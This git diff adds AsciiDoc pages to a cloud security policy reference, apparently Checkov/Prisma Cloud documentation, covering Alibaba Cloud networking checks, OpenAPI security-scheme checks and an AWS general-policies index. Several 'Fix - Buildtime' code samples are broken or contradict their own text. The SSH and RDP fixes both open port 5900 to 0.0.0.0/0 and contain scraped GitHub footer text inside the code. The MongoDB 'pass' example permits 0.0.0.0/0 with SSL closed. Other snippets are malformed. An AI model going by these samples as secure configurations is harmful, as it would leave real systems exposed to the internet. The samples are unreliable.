b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-mongodb-is-deployed-inside-a-vpc.adoc @@ -0,0 +1,67 @@ +== Alibaba Cloud MongoDB is not deployed inside a VPC + + +=== Policy Details +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 8f96497a-ecbd-4ee2-a77b-4495a21d521e + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/MongoDBInsideVPC.py[CKV_ALI_41] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + +Deploying your MongoDB database inside a VPC helps protect your data from unauthorized access or tampering by isolating the database from the public internet. +By deploying your database inside a VPC, you can help ensure that only authorized users with the correct permissions can access the data, and that the data is protected from external threats such as hackers or malware. + +=== Fix - Buildtime + + +*Terraform* + + + + +[source,go] +---- +{ + "resource "alicloud_mongodb_instance" "pass" { + engine_version = "3.4" + db_instance_class = "dds.mongo.mid" + db_instance_storage = 10 + vswitch_id = alicloud_vswitch.ditch.id + security_ip_list = ["0.0.0.0/0","10.168.1.12", "100.69.7.112"] + kms_encryption_context= { + + } + + # tde_status = "Disabled" + ssl_action = "Close" + # not set + network_type = "VPC" +} + + +resource "alicloud_vswitch" "ditch" { + vpc_id = "anyoldtripe" + cidr_block = "0.0.0.0/0" +}", + +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-rds-instance-uses-ssl.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-rds-instance-uses-ssl.adoc new file mode 100644 index 000000000..77b1fa1c7 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-alibaba-cloud-rds-instance-uses-ssl.adoc @@ -0,0 +1,64 @@ +== Alibaba Cloud RDS instance does not use SSL + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 20f83821-cc13-405f-a437-5926c6ef9919 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/RDSInstanceSSL.py[CKV_ALI_20] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +If an Alibaba Cloud RDS instance is not using SSL (Secure Sockets Layer) to encrypt data transmissions, there are several potential risks such as data interception, data tampering and compliance violations. By implementing SSL, you can help protect your data by encrypting the data during transmission between the RDS instance instance and the client. This ensures that only authorized users with the correct keys can access and decrypt the data. + +=== Fix - Buildtime + + +*Terraform* + +To configure an Alibaba Cloud RDS instance to use SSL, add the following code to your Terraform file during buildtime. + + + + +[source,go] +---- +{ + "resource "alicloud_db_instance" "pass" { + engine = "MySQL" + engine_version = "5.6" + ssl_action = "Open" + instance_storage = "30" + instance_type = "mysql.n2.small.25" + parameters = [{ + name = "innodb_large_prefix" + value = "ON" + }, { + + name = "connect_timeout" + value = "50" + }] + +}", +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-22.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-22.adoc new file mode 100644 index 000000000..79f16ade4 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-22.adoc @@ -0,0 +1,84 @@ +== Alibaba Cloud Security group allow internet traffic to SSH port (22) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 2b857e15-2f76-4d8b-bff9-39f92b8569e1 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress22.py[CKV_ALI_2] + +|Severity +|HIGH + +|Subtype +|Build +// , Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Allowing internet traffic to the SSH (Secure Shell) port (22) in Alibaba Cloud Security groups can pose several dangers, such as unauthorized access and data breaches. This policy identifies security groups that allow inbound traffic on SSH port (22) from the public internet. +As a best practice, restrict security groups to only allow permitted traffic and limit brute force attacks on your network. +//// +=== Fix - Runtime + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Elastic Compute Service + +. In the left-side navigation pane, choose Network & Security > Security Groups + +. Select the reported security group and then click Add Rules in the Actions column + +. In Inbound tab, Select the rule having 'Action' as Allow, 'Authorization Object' as 0.0.0.0/0 and 'Port Range' value as 22, Click Modify in the Actions column + +. Replace the value 0.0.0.0/0 with specific IP address range. + +. Click on 'OK' +//// + +=== Fix - Buildtime + + +*Terraform* + +To configure Security group rules to allow SSH access only from specific trusted IP addresses, add the following code to your Terraform file during buildtime. + + + +[source,go] +---- +{ + "resource "alicloud_security_group_rule" "allow_all_vncserver" { + type = "ingress" + ip_protocol = "tcp" + nic_type = "internet" + policy = "accept" + port_range = "5900/5900" + security_group_id = alicloud_security_group.default.id + cidr_ip = "0.0.0.0/0" +} + +Footer + 2022 GitHub, Inc. +Footer navigation +", +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-3389.adoc b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-3389.adoc new file mode 100644 index 000000000..33da41aac --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-networking-policies/ensure-no-alibaba-cloud-security-groups-allow-ingress-from-00000-to-port-3389.adoc @@ -0,0 +1,83 @@ +== Alibaba Cloud Security group allow internet traffic to RDP port (3389) + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 6c534f38-cc2c-4ebb-86a5-2e5d3114d376 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/alicloud/SecurityGroupUnrestrictedIngress3389.py[CKV_ALI_3] + +|Severity +|HIGH + +|Subtype +|Build +//, Run + +|Frameworks +|Terraform + +|=== + + + +=== Description + + +Allowing internet traffic to the RDP (Remote Desktop Protocol) port (3389) in Alibaba Cloud Security groups can pose several risks, such as unauthorized access and malware attacks. This policy restricts security groups to allow only authorized traffic to access your network. +//// +=== Fix - Runtime + + +Alibaba Cloud Portal + + + +. Log in to Alibaba Cloud Portal + +. Go to Elastic Compute Service + +. In the left-side navigation pane, choose Network & Security > Security Groups + +. Select the reported security group and then click Add Rules in the Actions column + +. In Inbound tab, Select the rule having 'Action' as Allow, 'Authorization Object' as 0.0.0.0/0 and 'Port Range' value as 3389, Click Modify in the Actions column + +. Replace the value 0.0.0.0/0 with specific IP address range. + +. Click on 'OK' +//// + +=== Fix - Buildtime + + +*Terraform* + +To configure Security group rules to restrict internet traffic to the RDP (Remote Desktop Protocol) port (3389) in your Alibaba Cloud Security groups, add the following code to your Terraform file during buildtime. + + +[source,go] +---- +{ + "resource "alicloud_security_group_rule" "allow_all_vncserver" { + type = "ingress" + ip_protocol = "tcp" + nic_type = "internet" + policy = "accept" + port_range = "5900/5900" + security_group_id = alicloud_security_group.default.id + cidr_ip = "0.0.0.0/0" +} + +Footer + 2022 GitHub, Inc. +Footer navigation +", +} +---- + diff --git a/code-security/policy-reference/alibaba-policies/alibaba-policies.adoc b/code-security/policy-reference/alibaba-policies/alibaba-policies.adoc new file mode 100644 index 000000000..83185ef11 --- /dev/null +++ b/code-security/policy-reference/alibaba-policies/alibaba-policies.adoc @@ -0,0 +1,3 @@ +== Alibaba Policies + + diff --git a/code-security/policy-reference/api-policies/api-policies.adoc b/code-security/policy-reference/api-policies/api-policies.adoc new file mode 100644 index 000000000..ba73b2bc3 --- /dev/null +++ b/code-security/policy-reference/api-policies/api-policies.adoc @@ -0,0 +1,3 @@ +== API Policies + + diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty.adoc new file mode 100644 index 000000000..4e3192892 --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty.adoc @@ -0,0 +1,54 @@ +== OpenAPI If the security scheme is not of type 'oauth2', the array value must be empty + + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| d9145ac2-c2bf-416b-97c6-a05ec8668827 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py[CKV_OPENAPI_2] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + + +Restrict the security section of OpenAPI documents to only include OAuth 2.0 authorization schemes defined in the security definitions section to prevent unauthorized access to the API. This is achieved by ensuring that only OAuth 2.0 schemes defined in the security section have a value. + +=== Fix - Buildtime + +Restrict the security section of OpenAPI documents to only include OAuth 2.0 authorization schemes, add the following code to your Terraform file during buildtime. + + +*OpenAPI* + + +Ensure that your generated OpenAPI document does not include a security section for authentication types that are not OAuth 2.0. +Below is an example: + +[source,yaml] +---- +securityDefinitions: +some_auth: +type: basic +- security: +- - some_auth: +- - write: some +- - read: some +---- diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-operations-is-not-empty.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-operations-is-not-empty.adoc new file mode 100644 index 000000000..3f8594640 --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-operations-is-not-empty.adoc @@ -0,0 +1,55 @@ +== OpenAPI Security object for operations, if defined, must define a security scheme, otherwise it should be considered an error + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 1cf52c26-0af3-4be8-b9a9-105b8ae8aaf2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/generic/SecurityOperations.py[CKV_OPENAPI_5] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + +If security schemes are not defined in OpenAPI Security Objects for Operations, the API may be exposed without proper authentication, which could lead to unauthorized access. This could result in security vulnerabilities that can be exploited by attackers to gain access to sensitive data or perform unauthorized actions. + + + +=== Fix - Buildtime + +*OpenAPI* + + + + +Ensure that you have an authentication type in the security section of your path. +For example: + +[source,yaml] +---- +paths: + "/": + get: + operationId: id + summary: example +- security: [] ++ security: ++ - OAuth2: ++ - write +---- diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-requirement-defined-in-securitydefinitions.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-requirement-defined-in-securitydefinitions.adoc new file mode 100644 index 000000000..52c6ae97e --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-requirement-defined-in-securitydefinitions.adoc @@ -0,0 +1,50 @@ +== OpenAPI Security requirement not defined in the security definitions + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 5cc16527-6ece-48aa-a135-89fcd361c402 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/SecurityRequirement.py[CKV_OPENAPI_6] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + + +Security definitions in the `security` section of a path or root should refer to an authentication scheme identified in the `securityDefinitions` section. + +=== Fix - Buildtime + +*OpenAPI* + + +Example: +[source,yaml] +---- + +... +security: +- petstore_auth: +- write:pets +- read:pets + +... +---- + diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel.adoc new file mode 100644 index 000000000..14d7568ca --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel.adoc @@ -0,0 +1,54 @@ +== Cleartext credentials over unencrypted channel should not be accepted for the operation + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| e78cca1d-0acc-45c1-8bf4-8fb7e0210d96 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py[CKV_OPENAPI_3] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + + +Sending credentials over HTTP in cleartext exposes API calls to attacks including man-in-the-middle attacks. +Ensure that you are using an encrypted channel for sending credentials. + +=== Fix - Buildtime + + +*OpenAPI* + + +Ensure that you aren't using the unencryptedScheme. +For example: +[source,yaml] +---- +components: +securitySchemes: +- unencryptedScheme: +- type: http +- scheme: basic +paths: +"/": +get: +security: +- - unencryptedScheme: [] +---- diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-securitydefinitions-is-defined-and-not-empty.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-securitydefinitions-is-defined-and-not-empty.adoc new file mode 100644 index 000000000..817c97b08 --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-securitydefinitions-is-defined-and-not-empty.adoc @@ -0,0 +1,59 @@ +== OpenAPI Security Definitions Object should be set and not empty + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 10efd986-6125-41f6-83f9-871a0a657aae + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/SecurityDefinitions.py[CKV_OPENAPI_1] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + + +Define the authentication types that your API supports for OpenAPI/Swagger 2.0 in securityDefinitions. +HNot defining authentication types exposes your APIs to attacks, while not documenting the authentication type makes it more difficult to understand how to access your API. + +=== Fix - Buildtime + + +*OpenAPI* + + +Ensure that your OpenAPI 2.0 spec includes a securityDefinitions section. +For example: +[source,yaml] +---- +securityDefinitions: +BasicAuth: +type: basic +ApiKeyAuth: +type: apiKey +in: header +name: apiKey +OAuth2: +type: oauth2 +flow: implicit +authorizationUrl: https://swagger.io/api/oauth/dialog +tokenUrl: https://swagger.io/api/oauth/token +scopes: +read: read +write: write +---- diff --git a/code-security/policy-reference/api-policies/openapi-policies/ensure-that-the-global-security-field-has-rules-defined.adoc b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-the-global-security-field-has-rules-defined.adoc new file mode 100644 index 000000000..b52edf884 --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/ensure-that-the-global-security-field-has-rules-defined.adoc @@ -0,0 +1,46 @@ +== OpenAPI Security object needs to have defined rules in its array and rules should be defined in the securityScheme + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 21b82979-16c2-4cfe-92e6-7848d37c04e2 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py[CKV_OPENAPI_4] + +|Severity +|HIGH + +|Subtype +|Build + +|Frameworks +|OpenAPI + +|=== + + + +=== Description + + +OpenAPI uses security schemes to reference authentication and authorization schemes. +Your APIs should have authentication schemes in place and documented in the OpenAPI specification, as well as applied to individual operations or the entire API in the security details. + +=== Fix - Buildtime + + +*OpenAPI* + + +Ensure that you have a securityScheme component and application. +For example: +[source,yaml] +---- +components: +security: +---- diff --git a/code-security/policy-reference/api-policies/openapi-policies/openapi-policies.adoc b/code-security/policy-reference/api-policies/openapi-policies/openapi-policies.adoc new file mode 100644 index 000000000..1891c65ed --- /dev/null +++ b/code-security/policy-reference/api-policies/openapi-policies/openapi-policies.adoc @@ -0,0 +1,39 @@ +== OpenAPI Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:ensure-that-if-the-security-scheme-is-not-of-type-oauth2-the-array-value-must-be-empty.adoc[OpenAPI If the security scheme is not of type 'oauth2', the array value must be empty] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/Oauth2SecurityRequirement.py[CKV_OPENAPI_2] +|HIGH + + +|xref:ensure-that-security-operations-is-not-empty.adoc[OpenAPI Security object for operations, if defined, must define a security scheme, otherwise it should be considered an error] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/generic/SecurityOperations.py[CKV_OPENAPI_5] +|HIGH + + +|xref:ensure-that-security-requirement-defined-in-securitydefinitions.adoc[OpenAPI Security requirement not defined in the security definitions] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/SecurityRequirement.py[CKV_OPENAPI_6] +|HIGH + + +|xref:ensure-that-security-schemes-dont-allow-cleartext-credentials-over-unencrypted-channel.adoc[Cleartext credentials over unencrypted channel should not be accepted for the operation] +| https://github.com/bridgecrewio/checkov/blob/main/checkov/openapi/checks/resource/v3/CleartextOverUnencryptedChannel.py[CKV_OPENAPI_3] +|HIGH + + +|xref:ensure-that-securitydefinitions-is-defined-and-not-empty.adoc[OpenAPI Security Definitions Object should be set and not empty] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/v2/SecurityDefinitions.py[CKV_OPENAPI_1] +|HIGH + + +|xref:ensure-that-the-global-security-field-has-rules-defined.adoc[OpenAPI Security object needs to have defined rules in its array and rules should be defined in the securityScheme] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/openapi/checks/resource/generic/GlobalSecurityFieldIsEmpty.py[CKV_OPENAPI_4] +|HIGH + + +|=== + diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/autoscaling-groups-should-supply-tags-to-launch-configurations.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/autoscaling-groups-should-supply-tags-to-launch-configurations.adoc new file mode 100644 index 000000000..323fe0e9f --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/autoscaling-groups-should-supply-tags-to-launch-configurations.adoc @@ -0,0 +1,65 @@ +== Autoscaling groups did not supply tags to launch configurations + + +=== Policy Details + +[width=45%] +[cols="1,1"] +|=== +|Prisma Cloud Policy ID +| 660b9b45-f88a-476f-a1f8-292f9e284bd6 + +|Checkov Check ID +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AutoScalingTagging.py[CKV_AWS_153] + +|Severity +|LOW + +|Subtype +|Build + +|Frameworks +|Terraform,TerraformPlan + +|=== + + + +=== Description + + +Tags help you do the following: + +* Control access to Auto Scaling groups based on tags. +You can use conditions in your IAM policies to control access to Auto Scaling groups based on the tags on that group. + +* Identify and organize your AWS resources. +Many AWS services support tagging, so you can assign the same tag to resources from different services to indicate that the resources are related. +You can apply tag-based, resource-level permissions in the identity-based policies that you create for Amazon EC2 Auto Scaling. +This gives you better control over which resources a user can create, modify, use, or delete. + +=== Fix - Buildtime + + +*Terraform* + + +* *Resource:* aws_autoscaling_group +* *Arguments:* launch_configuration, tags + + +[source,go] +---- +resource "aws_autoscaling_group" "passtag" { + ... ++ launch_configuration = aws_launch_configuration.foobar.name ++ tags = concat( + [ + { + "key" = "interpolation1" + "value" = "value3" + "propagate_at_launch" = true + }, + ... +} +---- diff --git a/code-security/policy-reference/aws-policies/aws-general-policies/aws-general-policies.adoc b/code-security/policy-reference/aws-policies/aws-general-policies/aws-general-policies.adoc new file mode 100644 index 000000000..680a892bc --- /dev/null +++ b/code-security/policy-reference/aws-policies/aws-general-policies/aws-general-policies.adoc @@ -0,0 +1,865 @@ +== AWS General Policies + +[width=85%] +[cols="1,1,1"] +|=== +|Policy|Checkov Check ID| Severity + +|xref:autoscaling-groups-should-supply-tags-to-launch-configurations.adoc[Autoscaling groups did not supply tags to launch configurations] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AutoScalingTagging.py[CKV_AWS_153] +|LOW + + +|xref:bc-aws-general-100.adoc[AWS Image Builder component not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py[CKV_AWS_180] +|LOW + + +|xref:bc-aws-general-101.adoc[AWS S3 Object Copy not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py[CKV_AWS_181] +|LOW + + +|xref:bc-aws-general-102.adoc[AWS Doc DB not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py[CKV_AWS_182] +|LOW + + +|xref:bc-aws-general-103.adoc[AWS EBS Snapshot Copy not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py[CKV_AWS_183] +|LOW + + +|xref:bc-aws-general-104.adoc[AWS Elastic File System (EFS) is not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py[CKV_AWS_184] +|LOW + + +|xref:bc-aws-general-105.adoc[AWS Kinesis streams encryption is using default KMS keys instead of Customer's Managed Master Keys] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py[CKV_AWS_185] +|LOW + + +|xref:bc-aws-general-106.adoc[AWS S3 bucket Object not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py[CKV_AWS_186] +|LOW + + +|xref:bc-aws-general-107.adoc[AWS Sagemaker domain not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py[CKV_AWS_187] +|LOW + + +|xref:bc-aws-general-109.adoc[AWS EBS Volume not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py[CKV_AWS_189] +|LOW + + +|xref:bc-aws-general-110.adoc[AWS lustre file system not configured with CMK key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py[CKV_AWS_190] +|LOW + + +|xref:bc-aws-general-111.adoc[AWS Elasticache replication group not configured with CMK key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py[CKV_AWS_191] +|LOW + + +|xref:bc-aws-general-22.adoc[AWS Kinesis streams are not encrypted using Server Side Encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/KinesisStreamEncryptionType.py[CKV_AWS_43] +|MEDIUM + + +|xref:bc-aws-general-23.adoc[DAX is not securely encrypted at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DAXEncryption.py[CKV_AWS_47] +|HIGH + + +|xref:bc-aws-general-24.adoc[ECR image tags are not immutable] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECRImmutableTags.py[CKV_AWS_51] +|LOW + + +|xref:bc-aws-general-26.adoc[AWS resources that support tags do not have Tags] +|[CKV_AWS_CUSTOM_1] +|LOW + + +|xref:bc-aws-general-27.adoc[AWS CloudFront web distribution with AWS Web Application Firewall (AWS WAF) service disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/WAFEnabled.py[CKV_AWS_68] +|MEDIUM + + +|xref:bc-aws-general-28.adoc[DocumentDB is not encrypted at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/DocDBEncryption.py[CKV_AWS_74] +|MEDIUM + + +|xref:bc-aws-general-29.adoc[Athena Database is not encrypted at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AthenaDatabaseEncryption.py[CKV_AWS_77] +|MEDIUM + + +|xref:bc-aws-general-30.adoc[CodeBuild project encryption is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/CodeBuildProjectEncryption.py[CKV_AWS_78] +|MEDIUM + + +|xref:bc-aws-general-31.adoc[AWS EC2 instance not configured with Instance Metadata Service v2 (IMDSv2)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/IMDSv1Disabled.py[CKV_AWS_79] +|MEDIUM + + +|xref:bc-aws-general-32.adoc[MSK cluster encryption at rest and in transit is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/MSKClusterEncryption.py[CKV_AWS_81] +|MEDIUM + + +|xref:bc-aws-general-33.adoc[Athena workgroup does not prevent disabling encryption] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AthenaWorkgroupConfiguration.py[CKV_AWS_82] +|MEDIUM + + +|xref:bc-aws-general-37.adoc[Glue Data Catalog encryption is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/GlueDataCatalogEncryption.py[CKV_AWS_94] +|HIGH + + +|xref:bc-aws-general-38.adoc[Not all data stored in Aurora is securely encrypted at rest] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AuroraEncryption.py[CKV_AWS_96] +|HIGH + + +|xref:bc-aws-general-39.adoc[EFS volumes in ECS task definitions do not have encryption in transit enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ECSTaskDefinitionEFSVolumeEncryption.py[CKV_AWS_97] +|HIGH + + +|xref:bc-aws-general-40.adoc[AWS SageMaker endpoint not configured with data encryption at rest using KMS key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SagemakerEndpointConfigurationEncryption.py[CKV_AWS_98] +|HIGH + + +|xref:bc-aws-general-41.adoc[AWS Glue security configuration encryption is not enabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/GlueSecurityConfiguration.py[CKV_AWS_99] +|HIGH + + +|xref:bc-aws-general-42.adoc[Neptune cluster instance is publicly available] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/NeptuneClusterInstancePublic.py[CKV_AWS_102] +|HIGH + + +|xref:bc-aws-general-43.adoc[AWS Load Balancer is not using TLS 1.2] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/cloudformation/checks/resource/aws/ALBListenerTLS12.py[CKV_AWS_103] +|HIGH + + +|xref:bc-aws-general-97.adoc[AWS Kinesis Video Stream not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py[CKV_AWS_177] +|LOW + + +|xref:bc-aws-general-99.adoc[AWS FSX Windows filesystem not encrypted using Customer Managed Key] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py[CKV_AWS_179] +|LOW + + +|xref:bc-aws-logging-32.adoc[Postgres RDS does not have Query Logging enabled] +| https://github.com/bridgecrewio/checkov/blob/master/checkov/terraform/checks/graph_checks/aws/PostgresRDSHasQueryLoggingEnabled.yaml[CKV2_AWS_27] +|MEDIUM + + +|xref:bc-aws-networking-62.adoc[Deletion protection disabled for load balancer] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/SSMSessionManagerDocumentLogging.py[CKV_AWS_113] +|MEDIUM + + +|xref:bc-aws-storage-1.adoc[AWS QLDB ledger has deletion protection is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py[CKV_AWS_172] +|LOW + + +|xref:ensure-api-gateway-caching-is-enabled.adoc[AWS API Gateway caching is disabled] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/APIGatewayCacheEnable.py[CKV_AWS_120] +|LOW + + +|xref:ensure-aws-acm-certificates-has-logging-preference.adoc[AWS ACM certificates does not have logging preference] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py[CKV_AWS_234] +|LOW + + +|xref:ensure-aws-all-data-stored-in-the-elasticsearch-domain-is-encrypted-using-a-customer-managed-key-cmk.adoc[AWS all data stored in the Elasticsearch domain is not encrypted using a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py[CKV_AWS_247] +|LOW + + +|xref:ensure-aws-ami-copying-uses-a-customer-managed-key-cmk.adoc[AWS AMI copying does not use a Customer Managed Key (CMK)] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py[CKV_AWS_236] +|LOW + + +|xref:ensure-aws-ami-launch-permissions-are-limited.adoc[AWS AMI launch permissions are not limited] +| https://github.com/bridgecrewio/checkov/tree/master/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py[CKV_AWS_205] +|LOW + + 